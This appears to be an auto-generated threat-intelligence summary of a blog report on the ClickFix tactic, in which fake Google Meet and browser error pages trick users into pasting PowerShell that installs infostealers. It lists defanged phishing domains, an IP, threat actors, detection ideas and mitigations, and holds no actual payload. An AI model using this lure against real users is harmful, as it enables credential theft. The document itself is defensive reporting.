Full Report
This blog post provides a chronological overview of the observed ClickFix campaigns. We further share technical details about a ClickFix cluster that uses fake Google Meet video conference pages to distribute infostealers. Context In May 2024, a new social engineering tactic called ClickFix emerged, featuring a ClearFake cluster that the Sekoia Threat Detection & Research […] The post ClickFix tactic: The Phantom Meet (Infostealers) appeared first on InfoStealers.
Analysis Summary
# Tool/Technique: ClickFix Tactic
## Overview
The ClickFix tactic is a novel social engineering method observed in malware distribution campaigns, which involves displaying fake error messages in web browsers to trick users into copying and executing specific malicious PowerShell code. This tactic aims to bypass antivirus scanning and browser security features by leveraging user interaction with a seemingly legitimate browser/system error prompt.
## Technical Details
- Type: Technique (Social Engineering Lure)
- Platform: Windows and macOS (as the tactic is used to distribute malware targeting both)
- Capabilities: Deceiving users into executing PowerShell commands via clipboard manipulation using browser-based fake error prompts.
- First Seen: May 2024 (Reported by Proofpoint researchers)
## MITRE ATT&CK Mapping
This tactic primarily focuses on initial access and execution via user interaction:
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (If delivered via email with HTML files)
- T1204 - User Execution
- T1204.002 - Malicious File
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell (For the execution phase of the copied code)
## Functionality
### Core Capabilities
- **Deceptive Lure:** Displaying fake error messages within a web browser (e.g., mimicking Google Chrome, Facebook, PDFSimpli, reCAPTCHA errors).
- **Instructional Prompt:** Directing victims to copy and paste specific, often malicious, PowerShell code snippet presented within the fake error window (using prompts like "Press the key combination" or "CTRL+V").
- **Credential/Data Theft Distribution:** Used to deploy various forms of malware, most commonly infostealers, but also botnets and Remote Access Tools (RATs).
### Advanced Features
- **Impersonation Infrastructure:** Utilization of convincing domains impersonating legitimate services, such as Google Meet pages (discovering by Sekoia analysts), to increase user trust.
- **Evasion:** Designed to improve infection rates by leveraging drive-by download techniques and evading real-time AV/browser security checks by relying on manual user execution of a script derived from a webpage element.
## Indicators of Compromise
*Note: Indicators listed are associated with a documented cluster leveraging ClickFix, specifically using fake Google Meet pages.*
- File Hashes: [Not provided in the context]
- File Names: [Not provided in the context regarding the final payload, but the delivery mechanism involves HTML files disguised as Word documents or fake installer prompts.]
- Registry Keys: [Not provided in the context]
- Network Indicators:
- `meet[.]google[.]us-join[.]com`
- `meet[.]googie[.]com-join[.]us`
- `meet[.]google[.]com-join[.]us`
- `meet[.]google[.]web-join[.]com`
- `meet[.]google[.]webjoining[.]com`
- `meet[.]google[.]cdm-join[.]us`
- `meet[.]google[.]us07host[.]com`
- `googiedrivers[.]com`
- IP Address: `77.221.157[.]170`
- Behavioral Indicators: Execution of PowerShell commands derived directly from content copied from a browser-displayed prompt or error box.
## Associated Threat Actors
Observed clusters using the ClickFix tactic to distribute infostealers via fake Google Meet pages are associated with:
- **Slavic Nation Empire (SNE)** (Sub-team of Marko Polo cryptocurrency scam)
- **Scamquerteo** (Sub-team of CryptoLove cryptocurrency scam)
- **TA571** (Observed leveraging the tactic since March 2024 via email phishing)
- Other intrusion sets using lures like fake Google Chrome, Facebook, PDFSimpli, and reCAPTCHA pages.
## Detection Methods
- Signature-based detection: Detection of specific PowerShell code blocks delivered via this method (if unique), or detection of specific domains/IPs listed above.
- Behavioral detection: Monitoring command-line arguments showing PowerShell accessing/executing content originating from a browser process, or scripts initiated immediately following interaction with strange browser dialogs or temporary files dropped from web sessions.
- YARA rules: [Not provided in the context]
## Mitigation Strategies
- **User Training:** Highly emphasize user skepticism regarding unsolicited browser errors or prompts requiring key combinations or copy/paste operations involving command-line code.
- **Restrict PowerShell Remotely:** Implement policies restricting the ability of browsers or web-related processes to launch interactive command-line interpreters or utilize the clipboard for script execution.
- **Application Control/Whitelisting:** Limit which applications can execute PowerShell scripts.
- **Browser Security:** Ensure modern browser security features (like warning against malicious sites or drive-by downloads) are active.
## Related Tools/Techniques
The ClickFix tactic has been used to distribute various malware families, including:
- Matanbuchus
- DarkGate
- NetSupport RAT
- Lumma Stealer
- Various Windows and macOS Infostealers, Botnets, and RATs.
- Historical association with the **ClearFake** cluster in its initial emergence.